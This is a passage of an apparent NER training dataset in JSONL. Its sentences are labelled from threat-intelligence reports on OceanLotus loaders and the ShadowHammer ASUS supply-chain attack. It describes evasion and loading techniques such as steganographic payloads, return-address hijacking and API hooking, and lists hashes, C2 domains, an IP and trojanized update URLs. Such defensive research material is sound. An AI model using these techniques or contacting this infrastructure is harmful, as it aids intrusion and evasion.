.", "spans": {}, "info": {"id": "aptner_train_000847", "source": "aptner_train"}} {"text": "We came across multiple variations of this DLL containing different parent process names , possibly targeted specifically to the victim’s environment .", "spans": {"System: DLL": [[43, 46]]}, "info": {"id": "aptner_train_000848", "source": "aptner_train"}} {"text": "Some of these names include processes related to security software :", "spans": {}, "info": {"id": "aptner_train_000849", "source": "aptner_train"}} {"text": "wsc_proxy.exe plugins-setup.exe SoftManager.exe GetEFA.exe .", "spans": {"Indicator: wsc_proxy.exe": [[0, 13]], "Indicator: plugins-setup.exe": [[14, 31]], "Indicator: SoftManager.exe": [[32, 47]], "Indicator: GetEFA.exe": [[48, 58]]}, "info": {"id": "aptner_train_000850", "source": "aptner_train"}} {"text": "Features :", "spans": {}, "info": {"id": "aptner_train_000851", "source": "aptner_train"}} {"text": "Side-loaded DLL Anti-debugging/anti-sandboxing check for parent process name .", "spans": {"System: DLL": [[12, 15]]}, "info": {"id": "aptner_train_000852", "source": "aptner_train"}} {"text": "Loads next-stage payload using custom .png steganography .", "spans": {"System: custom .png steganography": [[31, 56]]}, "info": {"id": "aptner_train_000853", "source": "aptner_train"}} {"text": "Uses AES128 implementation from Crypto++ library for payload decryption .", "spans": {"System: Crypto++ library": [[32, 48]]}, "info": {"id": "aptner_train_000854", "source": "aptner_train"}} {"text": "Executes the payload by overwriting the return address on the stack .", "spans": {}, "info": {"id": "aptner_train_000855", "source": "aptner_train"}} {"text": "Known to load an updated version of Remy backdoor .", "spans": {"Malware: Remy backdoor": [[36, 49]]}, "info": {"id": "aptner_train_000856", "source": "aptner_train"}} {"text": "This DLL does not contain an export table and its entire functionality resides in the DllMain routine .", "spans": {"System: DLL": [[5, 
8]], "System: DllMain": [[86, 93]]}, "info": {"id": "aptner_train_000857", "source": "aptner_train"}} {"text": "Upon execution , the malware will first decrypt a string from its resources and compare it against the name of the parent process .", "spans": {}, "info": {"id": "aptner_train_000858", "source": "aptner_train"}} {"text": "If the names differ , the malware will simply exit without touching the payload .", "spans": {}, "info": {"id": "aptner_train_000859", "source": "aptner_train"}} {"text": "The resource containing the expected process name ( ICON/1 ) is XORed with the first byte of the legitimate C:\\Windows\\system.ini file – 0x3B ( \" ; \" ) .", "spans": {"Indicator: C:\\Windows\\system.ini": [[108, 129]]}, "info": {"id": "aptner_train_000860", "source": "aptner_train"}} {"text": "If the parent name matches , the malware will traverse the stack in order to find a return address that falls into the memory of the parent process’s text section .", "spans": {}, "info": {"id": "aptner_train_000861", "source": "aptner_train"}} {"text": "Next , the payload is read from the .png cover file , which seems to have been taken from an inspirational quotes website3 .", "spans": {}, "info": {"id": "aptner_train_000862", "source": "aptner_train"}} {"text": "In this instance , the payload is fully contained within the image’s pixel color codes , leaving no remaining data beyond the IEND marker .", "spans": {}, "info": {"id": "aptner_train_000863", "source": "aptner_train"}} {"text": "Finally , the loader will decrypt the payload to a memory buffer and overwrite the previously found return address with the pointer to that buffer , ensuring that the malicious shellcode will be executed when the DLL attempts to return to the caller .", "spans": {"System: DLL": [[213, 216]]}, "info": {"id": "aptner_train_000864", "source": "aptner_train"}} {"text": "The loader embedded in the payload seems to be a variant of the Veil \" shellcode_inject \" payload , previously used by 
OceanLotus to load older versions of Remy backdoor .", "spans": {"System: Veil": [[64, 68]], "System: shellcode_inject": [[71, 87]], "Organization: OceanLotus": [[119, 129]], "Malware: Remy backdoor": [[156, 169]]}, "info": {"id": "aptner_train_000865", "source": "aptner_train"}} {"text": "In this instance , the shellcode is configured to load an encoded backdoor from within the payload .", "spans": {}, "info": {"id": "aptner_train_000866", "source": "aptner_train"}} {"text": "The final payload comes in a form of a launcher DLL that contains an encrypted backdoor in its .rdata section and a plain-text configuration in its resources .", "spans": {"System: DLL": [[48, 51]]}, "info": {"id": "aptner_train_000867", "source": "aptner_train"}} {"text": "The resources also store one or more C2 communication modules .", "spans": {"System: C2": [[37, 39]]}, "info": {"id": "aptner_train_000868", "source": "aptner_train"}} {"text": "The backdoor DLL and the C2 communication DLLs are heavily obfuscated using high quantities of junk code , which significantly inflates their size and makes both static analysis and debugging more difficult .", "spans": {"System: DLL": [[13, 16]], "System: C2": [[25, 27]]}, "info": {"id": "aptner_train_000869", "source": "aptner_train"}} {"text": "In addition to Denes and Remy backdoors , at least two different communication modules were observed with different versions of this launcher – DNSProvider and HTTPProv .", "spans": {"Malware: Denes": [[15, 20]], "Malware: Remy backdoors": [[25, 39]], "System: DNSProvider": [[144, 155]], "System: HTTPProv": [[160, 168]]}, "info": {"id": "aptner_train_000870", "source": "aptner_train"}} {"text": "The launcher binary , which contains the final backdoor , is RC4 encrypted and wrapped in a layer of obfuscated shellcode .", "spans": {}, "info": {"id": "aptner_train_000871", "source": "aptner_train"}} {"text": "We can see the familiar DOS stub in plain text , but the rest of the header and binary body are 
encrypted .", "spans": {}, "info": {"id": "aptner_train_000872", "source": "aptner_train"}} {"text": "The shellcode is obfuscated using OceanLotus ’s standard approach of flattening the control flow and inserting junk opcodes ( as described in the ESET white paper on OceanLotus ) .", "spans": {"Organization: OceanLotus": [[34, 44], [166, 176]], "Organization: ESET": [[146, 150]]}, "info": {"id": "aptner_train_000873", "source": "aptner_train"}} {"text": "The shellcode starts in a fairly standard way – by walking the list of loaded modules in order to find the base of kernel32.dll library .", "spans": {"Indicator: kernel32.dll": [[115, 127]]}, "info": {"id": "aptner_train_000874", "source": "aptner_train"}} {"text": "Once kernel32 base is found , the shellcode will calculate the addresses of LoadLibraryA and GetProcAddress functions , and use them to resolve other necessary APIs , which include VirtualAlloc , RtlMoveMemory , and RtlZeroMemory .", "spans": {"System: kernel32": [[5, 13]], "System: LoadLibraryA": [[76, 88]], "System: GetProcAddress": [[93, 107]], "System: APIs": [[160, 164]], "System: VirtualAlloc": [[181, 193]], "System: RtlMoveMemory": [[196, 209]], "System: RtlZeroMemory": [[216, 229]]}, "info": {"id": "aptner_train_000875", "source": "aptner_train"}} {"text": "After resolving the APIs , the shellcode will decrypt the launcher binary and load it to the memory .", "spans": {"System: APIs": [[20, 24]]}, "info": {"id": "aptner_train_000876", "source": "aptner_train"}} {"text": "MZ header , PE header , as well as each section and their header , are decrypted separately using RC4 algorithm and a hardcoded key .", "spans": {"System: RC4": [[98, 101]]}, "info": {"id": "aptner_train_000877", "source": "aptner_train"}} {"text": "Once all sections are loaded , the relocations get fixed and the MZ/PE headers are zeroed out in memory .", "spans": {}, "info": {"id": "aptner_train_000878", "source": "aptner_train"}} {"text": "The shellcode then proceeds to 
execute the payload DLL’s entry point .", "spans": {}, "info": {"id": "aptner_train_000879", "source": "aptner_train"}} {"text": "The Internal name of this DLL is a randomly looking CLSID and it only exports one function called DllEntry .", "spans": {"System: DLL": [[26, 29]], "System: CLSID": [[52, 57]], "System: DllEntry": [[98, 106]]}, "info": {"id": "aptner_train_000880", "source": "aptner_train"}} {"text": "Upon execution , the launcher will attempt to hook legitimate wininet.dll library by overwriting its entry point in memory with the address of a malicious routine .", "spans": {"Indicator: wininet.dll": [[62, 73]]}, "info": {"id": "aptner_train_000881", "source": "aptner_train"}} {"text": "If successful , every time the system loads wininet.dll , the entry point of the subsequently dropped backdoor DLL will be executed before the original wininet entry point .", "spans": {"Indicator: wininet.dll": [[44, 55]], "System: DLL": [[111, 114]]}, "info": {"id": "aptner_train_000882", "source": "aptner_train"}} {"text": "There is no proper DLL injection routine – the payload is just decompressed to the memory as-is – so the malware needs to fix all the pointers in the decompressed code , which is done on a one-by-one basis using hardcoded values and offsets .", "spans": {"System: DLL": [[19, 22]]}, "info": {"id": "aptner_train_000883", "source": "aptner_train"}} {"text": "This part takes 90% of the whole launcher code and includes over 11 , 000 modifications .", "spans": {}, "info": {"id": "aptner_train_000884", "source": "aptner_train"}} {"text": "The launcher then calls the backdoor DLL’s entry point .", "spans": {}, "info": {"id": "aptner_train_000885", "source": "aptner_train"}} {"text": "The routine that reads configuration from resources and decompresses the C2 communication library is then called by temporarily replacing the pointer to CComCriticalSection function with the pointer to that routine .", "spans": {"System: C2": [[73, 75]], "System: 
CComCriticalSection": [[153, 172]]}, "info": {"id": "aptner_train_000886", "source": "aptner_train"}} {"text": "Such an obfuscation method makes it difficult to spot it in the code .", "spans": {}, "info": {"id": "aptner_train_000887", "source": "aptner_train"}} {"text": "The launcher loads configuration from resources and uses an export from the backdoor DLL to initialize config values in memory .", "spans": {"System: DLL": [[85, 88]]}, "info": {"id": "aptner_train_000888", "source": "aptner_train"}} {"text": "Resource P1/1 contains config values , including port number and a registry path .", "spans": {}, "info": {"id": "aptner_train_000889", "source": "aptner_train"}} {"text": "After the content of resource 0xC8 is decompressed , another function from the backdoor DLL is used to load the C2 communication module to the memory and call its \" CreateInstance \" export .", "spans": {"System: DLL": [[88, 91]], "System: C2": [[112, 114]], "System: CreateInstance": [[165, 179]]}, "info": {"id": "aptner_train_000890", "source": "aptner_train"}} {"text": "Finally , the launcher passes control to the main backdoor routine .", "spans": {}, "info": {"id": "aptner_train_000891", "source": "aptner_train"}} {"text": "OceanLotus : 0 4 name is read from resource P1/0x64 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000892", "source": "aptner_train"}} {"text": "OceanLotus : {12C044FA-A4AB-433B-88A2-32C3451476CE} memory pointer 4 points to a function that spawns another copy of malicious process .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000893", "source": "aptner_train"}} {"text": "OceanLotus : {9E3BD021-B5AD-49DEAE93-F178329EE0FE} C&C URLs varies content is read from resource P1/2 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000894", "source": "aptner_train"}} {"text": "OceanLotus : 0 config varies content is read from resource P1/1 .", "spans": {"Organization: 
OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000895", "source": "aptner_train"}} {"text": "OceanLotus : {B578B063-93FB-4A5F-82B4-4E6C5EBD393B} ? 4 0 ( config+0x486 ) .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000896", "source": "aptner_train"}} {"text": "OceanLotus : {5035383A-F7B0-424A-9C9A-CA667416BA6F} port number 4 0x1BB ( 443 ) ( config+0x46C ) .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000897", "source": "aptner_train"}} {"text": "OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000898", "source": "aptner_train"}} {"text": "The backdoor DLL is stored in the .rdata section of the launcher , compressed with LZMA , and encrypted with RC4 .", "spans": {"System: DLL": [[13, 16]], "System: LZMA": [[83, 87]], "System: RC4": [[109, 112]]}, "info": {"id": "aptner_train_000899", "source": "aptner_train"}} {"text": "The binary is heavily obfuscated with overlapping blocks of garbage code enclosed in pushf/popf instructions .", "spans": {}, "info": {"id": "aptner_train_000900", "source": "aptner_train"}} {"text": "The DllMain function replaces the pointer to GetModuleHandleA API with a pointer to hook routine that will return the base of the backdoor DLL when called with NULL as parameter ( instead of returing the handle to the launcher DLL ) .", "spans": {"System: DllMain": [[4, 11]], "System: GetModuleHandleA API": [[45, 65]], "System: DLL": [[139, 142], [227, 230]]}, "info": {"id": "aptner_train_000901", "source": "aptner_train"}} {"text": "The backdoor also contains an export that loads the C2 communication module reflectively to the memory from resource passed as parameter and then calls its \" CreateInstance \" export .", "spans": {"System: C2": [[52, 54]], "System: CreateInstance": [[158, 172]]}, "info": 
{"id": "aptner_train_000902", "source": "aptner_train"}} {"text": "While we are still in the process of analyzing this backdoor’s full functionality , it seems to be similar to the Remy backdoor described in our previous whitepaper on OceanLotus malware .", "spans": {"Malware: Remy backdoor": [[114, 127]], "Organization: OceanLotus": [[168, 178]]}, "info": {"id": "aptner_train_000903", "source": "aptner_train"}} {"text": "This DLL is stored in the launcher’s resources and compressed with LZMA .", "spans": {"System: DLL": [[5, 8]], "System: LZMA": [[67, 71]]}, "info": {"id": "aptner_train_000904", "source": "aptner_train"}} {"text": "It’s also heavily obfuscated , but in a slightly different way than the backdoor .", "spans": {}, "info": {"id": "aptner_train_000905", "source": "aptner_train"}} {"text": "Although it doesn’t contain an internal name , we believe it’s a variant of HttpProv library , as described in the ESET white paper on OceanLotus .", "spans": {"System: HttpProv library": [[76, 92]], "Organization: ESET": [[115, 119]], "Organization: OceanLotus": [[135, 145]]}, "info": {"id": "aptner_train_000906", "source": "aptner_train"}} {"text": "This module is used by the backdoor during HTTP/HTTPS communication with the C2 server and has a proxy bypass functionality .", "spans": {"System: C2": [[77, 79]]}, "info": {"id": "aptner_train_000907", "source": "aptner_train"}} {"text": "OceanLotus : ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[13, 77]]}, "info": {"id": "aptner_train_000908", "source": "aptner_train"}} {"text": "OceanLotus : 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999": [[13, 77]]}, "info": {"id": "aptner_train_000909", "source": 
"aptner_train"}} {"text": "OceanLotus : a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e": [[13, 77]]}, "info": {"id": "aptner_train_000910", "source": "aptner_train"}} {"text": "OceanLotus : 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[13, 77]]}, "info": {"id": "aptner_train_000911", "source": "aptner_train"}} {"text": "OceanLotus : e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e": [[13, 77]]}, "info": {"id": "aptner_train_000912", "source": "aptner_train"}} {"text": "OceanLotus : cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d": [[13, 77]]}, "info": {"id": "aptner_train_000913", "source": "aptner_train"}} {"text": "OceanLotus : 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934": [[13, 77]]}, "info": {"id": "aptner_train_000914", "source": "aptner_train"}} {"text": "OceanLotus : ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f": [[13, 77]]}, "info": {"id": "aptner_train_000915", "source": "aptner_train"}} {"text": "OceanLotus : 478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 Loader #2 .", "spans": {"Organization: 
OceanLotus": [[0, 10]], "Indicator: 478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382": [[13, 77]]}, "info": {"id": "aptner_train_000916", "source": "aptner_train"}} {"text": "OceanLotus : 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a Payload PNG ( loader #1 ) .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a": [[13, 77]]}, "info": {"id": "aptner_train_000917", "source": "aptner_train"}} {"text": "OceanLotus : 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f Payload PNG ( loader #2 ) .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f": [[13, 77]]}, "info": {"id": "aptner_train_000918", "source": "aptner_train"}} {"text": "OceanLotus : d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced Payload PNG ( loader #2 ) .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced": [[13, 77]]}, "info": {"id": "aptner_train_000919", "source": "aptner_train"}} {"text": "OceanLotus : E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb Loader #1 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb": [[13, 94]]}, "info": {"id": "aptner_train_000920", "source": "aptner_train"}} {"text": "OceanLotus : C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb Loader #2 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb": [[13, 94]]}, "info": {"id": "aptner_train_000921", "source": "aptner_train"}} {"text": "OceanLotus : kermacrescen.com 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: kermacrescen.com": 
[[13, 29]]}, "info": {"id": "aptner_train_000922", "source": "aptner_train"}} {"text": "OceanLotus : stellefaff.com 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: stellefaff.com": [[13, 27]]}, "info": {"id": "aptner_train_000923", "source": "aptner_train"}} {"text": "OceanLotus : manongrover.com 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: manongrover.com": [[13, 28]]}, "info": {"id": "aptner_train_000924", "source": "aptner_train"}} {"text": "OceanLotus : background.ristians.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: background.ristians.com:8888": [[13, 41]]}, "info": {"id": "aptner_train_000925", "source": "aptner_train"}} {"text": "OceanLotus : enum.arkoorr.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: enum.arkoorr.com:8531": [[13, 34]]}, "info": {"id": "aptner_train_000926", "source": "aptner_train"}} {"text": "OceanLotus : worker.baraeme.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: worker.baraeme.com:8888": [[13, 36]]}, "info": {"id": "aptner_train_000927", "source": "aptner_train"}} {"text": "OceanLotus : enum.arkoorr.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: enum.arkoorr.com:8888": [[13, 34]]}, "info": {"id": "aptner_train_000928", "source": "aptner_train"}} {"text": "OceanLotus : worker.baraeme.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: worker.baraeme.com:8531": [[13, 36]]}, "info": {"id": "aptner_train_000929", "source": "aptner_train"}} {"text": "OceanLotus : plan.evillese.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: plan.evillese.com:8531": [[13, 35]]}, "info": {"id": "aptner_train_000930", "source": "aptner_train"}} {"text": "OceanLotus : background.ristians.com:8531 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: background.ristians.com:8531": [[13, 41]]}, "info": {"id": 
"aptner_train_000931", "source": "aptner_train"}} {"text": "OceanLotus : plan.evillese.com:8888 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]], "Indicator: plan.evillese.com:8888": [[13, 35]]}, "info": {"id": "aptner_train_000932", "source": "aptner_train"}} {"text": "OceanLotus : SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B} 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000933", "source": "aptner_train"}} {"text": "OceanLotus : SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz 7244 .", "spans": {"Organization: OceanLotus": [[0, 10]], "System: SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz": [[13, 75]]}, "info": {"id": "aptner_train_000934", "source": "aptner_train"}} {"text": "OceanLotus : SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} 11b4 .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000935", "source": "aptner_train"}} {"text": "Operation ShadowHammer .", "spans": {}, "info": {"id": "aptner_train_000936", "source": "aptner_train"}} {"text": "Earlier today , Motherboard published a story by Kim Zetter on Operation ShadowHammer , a newly discovered supply chain attack that leveraged ASUS Live Update software .", "spans": {"Organization: Motherboard": [[16, 27]], "System: ASUS Live Update": [[142, 158]]}, "info": {"id": "aptner_train_000937", "source": "aptner_train"}} {"text": "While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore , we would like to share some important details about the attack .", "spans": {}, "info": {"id": "aptner_train_000938", "source": "aptner_train"}} {"text": "In January 2019 , we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility .", "spans": {"System: ASUS Live Update Utility": [[82, 106]]}, "info": {"id": "aptner_train_000939", "source": "aptner_train"}} 
{"text": "The attack took place between June and November 2018 and according to our telemetry , it affected a large number of users .", "spans": {}, "info": {"id": "aptner_train_000940", "source": "aptner_train"}} {"text": "ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS , UEFI , drivers and applications .", "spans": {"System: ASUS Live Update": [[0, 16]], "Organization: ASUS": [[61, 65]], "System: BIOS": [[139, 143]], "System: UEFI": [[146, 150]], "System: drivers": [[153, 160]], "System: applications": [[165, 177]]}, "info": {"id": "aptner_train_000941", "source": "aptner_train"}} {"text": "According to Gartner , ASUS is the world’s 5th-largest PC vendor by 2017 unit sales .", "spans": {"Organization: Gartner": [[13, 20]], "Organization: ASUS": [[23, 27]]}, "info": {"id": "aptner_train_000942", "source": "aptner_train"}} {"text": "This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase .", "spans": {}, "info": {"id": "aptner_train_000943", "source": "aptner_train"}} {"text": "Based on our statistics , over 57 , 000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time .", "spans": {"Organization: Kaspersky": [[40, 49]], "System: ASUS Live Update": [[112, 128]]}, "info": {"id": "aptner_train_000944", "source": "aptner_train"}} {"text": "We are not able to calculate the total count of affected users based only on our data ; however , we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide .", "spans": {}, "info": {"id": "aptner_train_000945", "source": "aptner_train"}} {"text": "The goal of the attack was to surgically target an unknown pool of users , which were identified by their network adapters’ MAC addresses .", "spans": {}, "info": {"id": "aptner_train_000946", "source": "aptner_train"}} 
{"text": "To achieve this , the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation .", "spans": {}, "info": {"id": "aptner_train_000947", "source": "aptner_train"}} {"text": "We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack .", "spans": {}, "info": {"id": "aptner_train_000948", "source": "aptner_train"}} {"text": "Of course , there might be other samples out there with different MAC addresses in their list .", "spans": {}, "info": {"id": "aptner_train_000949", "source": "aptner_train"}} {"text": "We believe this to be a very sophisticated supply chain attack , which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques .", "spans": {}, "info": {"id": "aptner_train_000950", "source": "aptner_train"}} {"text": "The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates ( eg : “ ASUSTeK Computer Inc. 
” ) .", "spans": {}, "info": {"id": "aptner_train_000951", "source": "aptner_train"}} {"text": "The malicious updaters were hosted on the official liveupdate01s.asus.com and liveupdate01.asus.com ASUS update servers .", "spans": {"Indicator: liveupdate01s.asus.com": [[51, 73]], "Indicator: liveupdate01.asus.com": [[78, 99]], "Organization: ASUS": [[100, 104]]}, "info": {"id": "aptner_train_000952", "source": "aptner_train"}} {"text": "We have contacted ASUS and informed them about the attack on Jan 31 , 2019 , supporting their investigation with IOCs and descriptions of the malware .", "spans": {"Organization: ASUS": [[18, 22]]}, "info": {"id": "aptner_train_000953", "source": "aptner_train"}} {"text": "Although precise attribution is not available at the moment , certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017 .", "spans": {}, "info": {"id": "aptner_train_000954", "source": "aptner_train"}} {"text": "The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM .", "spans": {"Organization: Microsoft": [[72, 81]], "Organization: BARIUM": [[104, 110]]}, "info": {"id": "aptner_train_000955", "source": "aptner_train"}} {"text": "BARIUM is an APT actor known to be using the Winnti backdoor .", "spans": {"Organization: BARIUM": [[0, 6]], "Malware: Winnti backdoor": [[45, 60]]}, "info": {"id": "aptner_train_000956", "source": "aptner_train"}} {"text": "Recently , our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved , that we believe is connected to this case as well .", "spans": {"Organization: ESET": [[31, 35]], "Organization: BARIUM": [[85, 91]]}, "info": {"id": "aptner_train_000957", "source": "aptner_train"}} {"text": "It should be noted that the numbers are also highly influenced by the distribution of Kaspersky users around the world .", "spans": {"Organization: Kaspersky": [[86, 95]]}, "info": {"id": 
"aptner_train_000958", "source": "aptner_train"}} {"text": "In principle , the distribution of victims should match the distribution of ASUS users around the world .", "spans": {}, "info": {"id": "aptner_train_000959", "source": "aptner_train"}} {"text": "We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack .", "spans": {}, "info": {"id": "aptner_train_000960", "source": "aptner_train"}} {"text": "To check this , it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found .", "spans": {}, "info": {"id": "aptner_train_000961", "source": "aptner_train"}} {"text": "Download an archive with the tool ( .exe ) .", "spans": {"Indicator: .exe": [[36, 40]]}, "info": {"id": "aptner_train_000962", "source": "aptner_train"}} {"text": "Also , you may check MAC addresses online .", "spans": {}, "info": {"id": "aptner_train_000963", "source": "aptner_train"}} {"text": "If you discover that you have been targeted by this operation , please e-mail us at : shadowhammer@kaspersky.com .", "spans": {"System: e-mail": [[71, 77]]}, "info": {"id": "aptner_train_000964", "source": "aptner_train"}} {"text": "Kaspersky Lab verdicts for the malware used in this and related attacks .", "spans": {"Organization: Kaspersky Lab": [[0, 13]]}, "info": {"id": "aptner_train_000965", "source": "aptner_train"}} {"text": "ShadowHammer : HEUR : Trojan.Win32.ShadowHammer.gen .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Malware: HEUR": [[15, 19]], "Malware: Trojan.Win32.ShadowHammer.gen": [[22, 51]]}, "info": {"id": "aptner_train_000966", "source": "aptner_train"}} {"text": "ShadowHammer : asushotfix.com .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: asushotfix.com": [[15, 29]]}, "info": {"id": "aptner_train_000967", "source": "aptner_train"}} {"text": "ShadowHammer : 141.105.71.116 .", "spans": {"Organization: ShadowHammer": 
[[0, 12]], "Indicator: 141.105.71.116": [[15, 29]]}, "info": {"id": "aptner_train_000968", "source": "aptner_train"}} {"text": "ShadowHammer : http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip": [[15, 107]]}, "info": {"id": "aptner_train_000969", "source": "aptner_train"}} {"text": "ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip": [[15, 109]]}, "info": {"id": "aptner_train_000970", "source": "aptner_train"}} {"text": "ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip": [[15, 109]]}, "info": {"id": "aptner_train_000971", "source": "aptner_train"}} {"text": "ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip": [[15, 109]]}, "info": {"id": "aptner_train_000972", "source": "aptner_train"}} {"text": "ShadowHammer : Liveupdate_Test_VER365.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: Liveupdate_Test_VER365.zip": [[15, 41]]}, "info": {"id": "aptner_train_000973", "source": "aptner_train"}} {"text": "ShadowHammer : aa15eb28292321b586c27d8401703494 .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: aa15eb28292321b586c27d8401703494": [[15, 47]]}, "info": {"id": 
